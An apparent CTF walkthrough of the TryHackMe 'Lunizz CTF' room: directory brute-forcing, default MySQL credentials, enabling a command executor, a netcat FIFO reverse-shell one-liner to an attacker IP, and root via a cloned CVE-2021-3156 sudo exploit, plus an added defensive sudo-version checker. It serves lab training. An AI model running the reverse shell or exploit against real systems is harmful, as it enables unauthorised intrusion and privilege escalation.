Lunizz CTF Tryhackme Writeup

Shamsher khan
5 min read · Apr 26, 2021

By Shamsher khan. This is a writeup of the TryHackMe room “Lunizz CTF”.


Room link: https://tryhackme.com/room/lunizzctfnd
Note: This room is Free

Enumeration

Rustscan

Directory Brute Forcing with Gobuster

We saw that port 80 is open, so let’s brute force the directories and files exposed by this web server using gobuster:

gobuster dir -u http://10.10.106.159/ -w directory-list-2.3-medium.txt -x .php,.html,.txt
http://10.10.106.159/whatever

The “whatever” directory looks interesting, as it indicates that we can run commands on the server, but the mode appears to be disabled:

/instructions.txt

Q.1: What is the default password for MySQL

As we can see, we found a user runcheck for MySQL and a corresponding default password. Let’s connect to the database using this user and password:

Login to MySQL

Now that we are connected, let’s explore the database.

Q.2: I can’t run commands, there must be a MySQL column that controls command executor

From the table “runcheck”, we were able to find the name of the column which appears to control the command executor, as its value is currently 0. We can update this value to 1 and check whether we can execute something.

Now that the column’s value is updated, let’s check if we can execute commands:

Q.3: a folder shouldn’t be.

Let’s execute “ls -lrt /” and we will get the answer to the above question.

Reverse Shell

From the command executor we can also get a reverse shell. Execute the following from the executor after starting a netcat listener on your Kali/attacker machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.12.26 4444 >/tmp/f

Upgrade shell

script -qc /bin/bash /dev/null
export TERM=xterm
control+z to background
stty raw -echo;fg

Exploring the directory /proct, which we found earlier and which was also highlighted by LinPEAS, we found a Python file with the following code:

I tried to crack the password, but had no luck.

It seems like this version of sudo is vulnerable to the CVE-2021-3156 vulnerability. This exploit abuses all sudo versions lower than version 1.8.31. This vulnerability gives you root privileges right away! We should also check which Ubuntu version is installed by running: lsb_release -a. Running this command should give you the following output:

Now that we know this box is vulnerable to CVE-2021-3156, let’s try to run an exploit! I found a script on GitHub that exploits the vulnerability mentioned above. Run the following on your attacker machine:

git clone https://github.com/blasty/CVE-2021-3156.git
tar -cvzf sudo.tar.gz CVE-2021-3156/
python3 -m http.server

Then on the box run:

available targets:
------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28

We are running Ubuntu 18.04 with sudo version 1.8.21, so we have to choose option 0. Do so by running:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color

The root.txt flag is located at /root/root.txt. The user.txt flag is located at /home/adam/user.txt.

This box was different from other boxes I have rooted before. The questions were a bit misleading since we exploited a vulnerability instead of brute-forcing. In the end, the CVE-2021-3156 vulnerability helped us root the box.
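Because the whole privilege-escalation step hinges on the installed sudo version, the following is an added example (not part of the original writeup) showing how a defender can triage that version condition without running any exploit. It parses the banner printed by `sudo --version` and classifies it against the affected range from the upstream advisory (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1, fixed in 1.9.5p2). The sample banners are constructed. One caveat the version string cannot capture: distributions backport the fix without changing the upstream version, so a hit here means “check the package changelog or advisory”, not “confirmed vulnerable”.

```python
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, pN suffix)

# Affected range per the upstream CVE-2021-3156 advisory: 1.8.2 .. 1.8.31p2
# and 1.9.0 .. 1.9.5p1. The fix shipped in 1.9.5p2. Distro packages often
# backport the fix without bumping this string (assumption: you will confirm
# against the distro changelog before calling a host vulnerable).
AFFECTED_FROM: Version = (1, 8, 2, 0)
FIXED_VERSION: Version = (1, 9, 5, 2)

_VERSION_RE = re.compile(
    r"Sudo version\s+(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.IGNORECASE
)


def parse_sudo_version(banner: str) -> Optional[Version]:
    """Turn the first line of `sudo --version` into a comparable tuple.

    "Sudo version 1.8.21p2" -> (1, 8, 21, 2); a missing pN suffix counts as 0.
    Returns None when the text does not look like sudo's version banner.
    """
    match = _VERSION_RE.search(banner)
    if not match:
        return None
    major, minor, patch, p = match.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def possibly_vulnerable(banner: str) -> Optional[bool]:
    """True if the upstream version falls in the affected range,
    False if it is outside it, None if the banner is unparseable."""
    version = parse_sudo_version(banner)
    if version is None:
        return None
    return AFFECTED_FROM <= version < FIXED_VERSION


def check_local_sudo() -> Optional[bool]:
    """Classify the sudo binary on this host; `sudo --version` needs no privileges."""
    try:
        result = subprocess.run(
            ["sudo", "--version"], capture_output=True, text=True, check=False
        )
    except FileNotFoundError:
        return None
    return possibly_vulnerable(result.stdout)


# Constructed sample banners; not captured from the room's machine.
SAMPLE_BANNERS = {
    "Ubuntu 18.04 stock": "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n",
    "Ubuntu 20.04 stock": "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n",
    "upstream fixed": "Sudo version 1.9.5p2\n",
    "pre-1.8.2 legacy": "Sudo version 1.7.10p9\n",
    "not sudo at all": "bash: sudo: command not found\n",
}

if __name__ == "__main__":
    for label, banner in SAMPLE_BANNERS.items():
        print(f"{label:20} -> possibly vulnerable: {possibly_vulnerable(banner)}")
    print(f"{'this host':20} -> possibly vulnerable: {check_local_sudo()}")
```

Run it on a host to get a quick yes/no/unknown for the upstream version; treat a True as a prompt to check `dpkg -s sudo` or `rpm -q --changelog sudo` for the backported fix rather than as a final verdict.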

Q.4: hi adam, do you remember our place?

Open this link and you will get a map:

https://www.google.com/maps/@68.5090469,27.481808,2a,75y,313.8h,103.6t/data=!3m7!1e1!3m5!1skJPO1zlKRtMAAAQZLDcQIQ!2e0!3e2!7i10000!8i5000

Answer: Northern Lights

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthroughs:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!


Shamsher khan

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer